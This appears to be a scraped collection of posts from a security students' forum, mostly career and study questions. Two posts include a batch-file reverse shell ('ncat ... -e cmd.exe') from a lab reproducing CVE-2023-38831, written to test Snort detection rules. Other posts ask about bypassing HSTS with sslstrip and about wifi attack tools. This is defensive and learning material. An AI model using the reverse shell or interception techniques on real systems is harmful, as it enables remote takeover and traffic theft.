Hi everyone, Im currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831 , where the bait file will rule a .bat script once opened.
Currently, my .bat file looks like this:

echo off

ncat xx.xx.xx.xx 4444 -e cmd.exe

Now heres the problem, my alert rule is able to detect the attack but when i change the alert to block, it does not seem to be able to block the attack. What should i do?
my alert rule:
alert tcp $HOME_NET 4444 -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; sid:10000001; rev:1;)

I have a bachelors in cybersecurity. However - my job is more of a Model-Based Systems Engineer, I need to understand telecom, network and Linux more in depth.

I believe I may have to branch out of the cybersecurity degree and may have to get a Systems Engineering or Network Engineering degree.

Looking at below $10k because my employer only covers $3k for the entire year. Scholarships would be a great plus.

Hi everyone, Im currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831 , where the bait file will rule a .bat script once opened.
Currently, my .bat file looks like this:

echo off

ncat xx.xx.xx.xx 4444 -e cmd.exe

So heres the issue, i cant seem to think of anything to put in the content field for my Snort rule. I've tried ncat, (the ip), and others but nothing seems to be alerting snort. Do you guys have any idea as to how i can do it?
Heres my current rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; content:""; sid:10000001; rev:1;)

Thanks for reading!

Hello,

I am currently a freshman in college studying cybersecurity. I’ve been exploring different fields, and I’ve set myself the goal of becoming a Cloud Security Architect down the road. The field seems interesting and well-compensated to me.

I want to know what I need to be doing starting now and throughout my career to reach my goal of becoming a Cloud Security Architect and make the big bucks ($200k to 300k). I want to get started working on certifications to gain more skills/knowledge and get ahead of my peers, and to also set myself up to get an internship. Due to me being a freshman, I won’t be able to get an internship this summer, so I am doing summer sales. However, I want to get one in 2025. Also, I am set to graduate in 2.5 years, so my timeframe is less than a typical college student, so I want to spend my time effectively.

What are all the steps I need to take starting now to become a Cloud Security Architect?

Certifications to get from fundamental to advanced?

What is the typical career progression of roles/job titles from a fresh college graduate to an experienced architect?

If theres anyone who sees themselves as an 'ethical hacker', i'd really appreciate if you could fill out this quick survey for university research project, should not take longer than 5 minutes!

https://erasmusuniversity.eu.qualtrics.com/jfe/form/SV_ebT25LJPWxVkVYq

All answers are guaranteed to be anonymous and the research will not be published, only shared within my uni.

I've read these stuffs: We've tried mobile data and different ISPs and the problem seems to persist.

https://maulwuff.de/research/ssl-debugging.html

https://serverfault.com/questions/872424/why-are-some-people-getting-a-connection-not-secure-page-when-accessing-my-serve

Would ssl pinning fix this issue of very few clients getting ssl error?

https://developers.wultra.com/components/ssl-pinning-android/1.3.x/documentation/

There is an option to install CA cert on android, but is it worth the hassle or is there something simpler and efficient?

I honestly don't understand why the hell I'm getting it as it's rated A+ in ssllabs.

just to note i'm super new to networking.

I have this assignment where i have to make all the devices in this network be able to ping each other. So far the the pcs in buildings 1 and 2 can ping each other and they can ping both the core and gateway router. But when I try to ping the server from the pcs I get the 'destination host unreachable' error. I have static routes that direct all traffic to the right interface on the gateway and core routers. (the server can ping the gateway router, and also fyi when I try to ping the pcs from the server it doesn't say 'destination unreachable', just 'request timed out').

Does anybody know what the problem is?

https://preview.redd.it/mwyi64w0ye4c1.png?width=747&format=png&auto=webp&s=1cc4827ba560dbaaa9ee5df92484742322f5b02a

https://preview.redd.it/zijxxqgj6f4c1.png?width=862&format=png&auto=webp&s=071ea42983cac1d58a6705a0c03a25538ad0086d

​

https://preview.redd.it/4u8eerrn6f4c1.png?width=859&format=png&auto=webp&s=fe7bc847093602ad392e36049a4feb04dbc103b3

Hi everyone,

I have been offered a role as an Analyst on a Cyber Monitoring team. I have no technical CS background but have experience in information systems and business processes. I did well in my interview because I researched and conceptually understood the value of educating people and using certain safeguards to defend organizational information.

The role would be a pivot into a new field and I believe I would excel in reporting writing. This said, I am curious as to whether I would require a coding background/knowledge to really thrive and build a career in the space long term? What are your thoughts?

https://blog.mandos.io/brief-28-jaxa-breached-chatgpt-data-extraction-attack-and-more/

What is the career scope in defensive security? Please give me some suggestions about where should I start from and what are the things I need to learn?

I dont have much experience doing pen-testing but im working with sslstrip for a project and right at the end of this tutorial is where im stuck: https://www.geeksforgeeks.org/ssl-stripping-and-arp-spoofing-in-kali-linux/. I know sslstrip is kind of outdated due to the hsts measures put into place for most websites now. I just want to prove sslstrip works, is there any way anybody knows a site that it will work on? Or any way to get around hsts with another program or method?

Anyone know of a good comprehensive resource on wifi hacking/pentesting. I have found a few good resources but I don't think i've seen anything exaustive that makes me feel secure in what i'm doing. I don't know if I need 1 or 2 wifi adapters for doing offensive attacks, I don't know if the wifi antenas should be completely vertical or bunny eared. I thought Alfa cards were the standard but then airgeddon told me that the realtek chipset makes having two cards necessary.

Most importantly I felt like I only had partial information on the attacks. I was trying to attack several different networks with different configurations only to find that some attacks are not going to be done the way they logically should or maybe i'm an idiot. Anyway, i'm looking for something comprehensive.

Also if anyone knows of a good guide on setting up a WPA2 Enterprise AP/AD setup i'd really appreciate it. I want to practice this and I dont feel my previous setup was ideal.

Is there a way to set up each client that VPN's into a Meraki firewall to then be forward to their respective VLAN if there are multiple VLANS on the LAN. How would you go to configure this? Thank you for the help as I think it is one critical thing to know.

Hi Everyone,

I'm working on a Cyber Security presentation. I was curious what the top concerns YTD were, and where some good places were to cite for research. I have general ideas about health care, and artificial intelligence, but I'm not really sure where to start looking.

Thanks!

Hey Everyone, I currently have an attempt scheduled for the Certified Network Pentester (CNPen) certification exam offered by the secops group, and due to a lack of reviews regarding the exam online, I just wanted to know reviews regarding the exam if anyone has attempted or passed this exam.

I am thinking about doing it, rn i am working on a IT company but not in netsec and i'd like to change my specialization to this field. I am looking for books or udemy courses but can't find anything.

Hey r/netsecstudents,

I wanted to share with you a tool I recently developed called "RepoList"

https://github.com/Ademking/repolist

RepoList is a command-line tool I built to effortlessly create wordlists from GitHub repos for security testing:

• Generate wordlists of files, directories, or both.
• Customize with prefixes, suffixes, and more.
• Works with private and public repos, supports branch selection and proxies.

🚀 Usage:

pip3 install repolist
repolist -u https://github.com/user/repo

Why ?
Automates wordlist creation, perfect for pentesting or bug bounty programs. Use it with tools like ffuf or gobuster for enhanced testing. For example:

repolist -u "https://github.com/WordPress/WordPress" | ffuf -u "http://example.com/FUZZ" -w -

Give RepoList a try and let me know your thoughts and any feedback you might have. Happy hunting!

I've recently launched a beta version of XSSy which is a site where you can learn about cross-site scripting. There are a number of labs which you can experiment with, and when you have a working payload you can submit it to the headless browser and claim your place on the hall of fame. You can also create your own labs, to collaborate on tricky XSS scenarios you encounter.

Hey everyone I work currently in SEM Marketing making about 65k a year. Do you think it’s worth it for me to go back to school to learn Cyber Security? I’m interested but don’t want to make a lateral move money wise. Opinions?

TJ Null released a new list to help those preparing to take the PWK/OSCP. It is a much shorter list then it use to be but for any alumni who wants to go through old boxes for fun times he made new lists that align with older versions that reflect his preparation.

​

Here is the link to the new list: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=273133724

Source: https://twitter.com/TJ_Null/status/1725510316484681935

Hey guys I'm a high school student interested in learning cloud sec and net sec as well. I'm asking that you guys guide me in a path for my learning. I would like anything that you guys recommend (how-tos, linux manpages, forums, etc..) pretty much anything. I'm really interested in this field and I want to do it in the future.